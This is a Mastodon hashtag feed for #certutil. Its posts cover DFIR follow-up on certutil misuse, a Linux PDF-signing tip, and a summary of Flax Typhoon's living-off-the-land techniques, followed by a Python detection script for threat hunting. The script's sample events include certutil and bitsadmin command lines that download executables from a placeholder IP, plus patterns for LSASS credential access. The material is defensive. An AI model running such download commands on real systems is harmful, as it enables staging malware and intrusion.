ioc.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
INDICATORS OF COMPROMISE (IOC) InfoSec Community within the Fediverse. Newbies, experts, gurus - Everyone is Welcome! Instance is supposed to be fast and secure.

#Certutil

Tedi Heriyanto<p>DFIR Next Steps: What To Do After You Find a Suspicious Use Of certutil.exe: <a href="https://www.cybertriage.com/dfir-next-steps/dfir-next-steps-what-to-do-after-you-find-a-suspicious-use-of-certutil-exe/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">cybertriage.com/dfir-next-step</span><span class="invisible">s/dfir-next-steps-what-to-do-after-you-find-a-suspicious-use-of-certutil-exe/</span></a></p><p><a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/certutil" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>certutil</span></a></p>
🏁⚡Omar Two Tone⚡🏁:verified:<p>random <a href="https://ioc.exchange/tags/Linux" class="mention hashtag" rel="tag">#<span>Linux</span></a> Tip:<br />if you have to digitally sign many <a href="https://ioc.exchange/tags/PDF" class="mention hashtag" rel="tag">#<span>PDF</span></a> documents, then follow the next steps:<br />1. create a new certificate with the <a href="https://ioc.exchange/tags/certutil" class="mention hashtag" rel="tag">#<span>certutil</span></a> command:<br />certutil -S -s &quot;CN=[ your full name ],O=[ Business or School ],OU=[ Department or position ],L=[ Location ],ST=[ State ],C=[ Country code ],E=[ your email ]&quot; -g 2048 -d sql:$HOME/.pki/nssdb -n [ new name of certificate ] -x -t &quot;Cu,Cu,Cu&quot; -p 405-555-5555 --email [ your email ] -m 1234<br />2. List the created certificate:<br />certutil -d sql:$HOME/.pki/nssdb -L<br />3. Use <a href="https://ioc.exchange/tags/Okular" class="mention hashtag" rel="tag">#<span>Okular</span></a> and go to: Settings &gt; Configure Backends &gt; PDF<br />4. In the section Certificate database, choose Custom and enter this path: $HOME/.pki/nssdb<br />5. Apply and restart Okular, and then you&#39;ll see the available certificate in the option of step 4 to sign digitally.</p>
Just Another Blue Teamer<p>Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as <a href="https://ioc.exchange/tags/FlaxTyphoon" class="mention hashtag" rel="tag">#<span>FlaxTyphoon</span></a>. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like <a href="https://ioc.exchange/tags/ChinaChopper" class="mention hashtag" rel="tag">#<span>ChinaChopper</span></a>, <a href="https://ioc.exchange/tags/MetaSploit" class="mention hashtag" rel="tag">#<span>MetaSploit</span></a>, and <a href="https://ioc.exchange/tags/Mimikatz" class="mention hashtag" rel="tag">#<span>Mimikatz</span></a>, they also rely on abusing <a href="https://ioc.exchange/tags/LOLBINS" class="mention hashtag" rel="tag">#<span>LOLBINS</span></a>, or living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using <a href="https://ioc.exchange/tags/powershell" class="mention hashtag" rel="tag">#<span>powershell</span></a>, <a href="https://ioc.exchange/tags/certutil" class="mention hashtag" rel="tag">#<span>certutil</span></a>, or <a href="https://ioc.exchange/tags/bitsadmin" class="mention hashtag" rel="tag">#<span>bitsadmin</span></a> to download tools, and accessing <a href="https://ioc.exchange/tags/LSASS" class="mention hashtag" rel="tag">#<span>LSASS</span></a> process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also provides a starting point for any organization to start threat hunting by using the technical details provided! 
Enjoy your weekend and <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="tag">#<span>HappyHunting</span></a>!</p><p><a href="https://ioc.exchange/tags/CyberSecurity" class="mention hashtag" rel="tag">#<span>CyberSecurity</span></a> <a href="https://ioc.exchange/tags/ITSecurity" class="mention hashtag" rel="tag">#<span>ITSecurity</span></a> <a href="https://ioc.exchange/tags/InfoSec" class="mention hashtag" rel="tag">#<span>InfoSec</span></a> <a href="https://ioc.exchange/tags/BlueTeam" class="mention hashtag" rel="tag">#<span>BlueTeam</span></a> <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="tag">#<span>ThreatIntel</span></a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="tag">#<span>ThreatHunting</span></a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="tag">#<span>ThreatDetection</span></a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="tag">#<span>readoftheday</span></a></p>
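A defender-side triage pass over the three TTP families the post names (LOLBIN downloads via certutil, bitsadmin or PowerShell; Run-key persistence; non-security-tool access to LSASS). This is an added example, not code from the post or from Microsoft's report; the simplified event schema, the sample events, the documentation IP 198.51.100.7 and the LSASS allowlist are constructed assumptions to tune per environment:

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events in a simplified schema (not a real Sysmon/EDR format).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/t.dat C:\Users\Public\t.dat"},
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Users\Public\setup.exe SHA256"},          # benign use
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download http://198.51.100.7/a.exe C:\Users\Public\a.exe"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},  # no URL
    {"type": "registry", "image": r"C:\Users\Public\a.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "registry", "image": r"C:\Program Files\Vendor\app.exe",
     "key": r"HKLM\SOFTWARE\Vendor\App\Settings"},                                    # not a Run key
    {"type": "process_access", "image": r"C:\Users\Public\a.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"type": "process_access", "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe"},                                    # allowlisted
]

# Native binaries the post says were used to fetch tooling; a URL on their command line is the signal.
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# One common "registry key modification for persistence": the Run / RunOnce keys.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\|$)", re.IGNORECASE)
# Assumed allowlist of security tooling that legitimately opens LSASS; tune per environment.
LSASS_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, int]]:
    """Return (rule_name, event_index) for every event matching one of the three TTPs."""
    findings: List[Tuple[str, int]] = []
    for i, ev in enumerate(events):
        if ev["type"] == "process" and basename(ev["image"]) in DOWNLOADERS \
                and URL_RE.search(ev["cmdline"]):
            findings.append(("lolbin_download", i))
        elif ev["type"] == "registry" and RUN_KEY_RE.search(ev["key"]):
            findings.append(("run_key_persistence", i))
        elif ev["type"] == "process_access" and basename(ev["target"]) == "lsass.exe" \
                and ev["image"].lower() not in LSASS_ALLOWLIST:
            findings.append(("lsass_access", i))
    return findings
```

Each hit is a pivot point for the hunt the post suggests: the parent process and user of the download, the target of the Run value, and the image that touched LSASS.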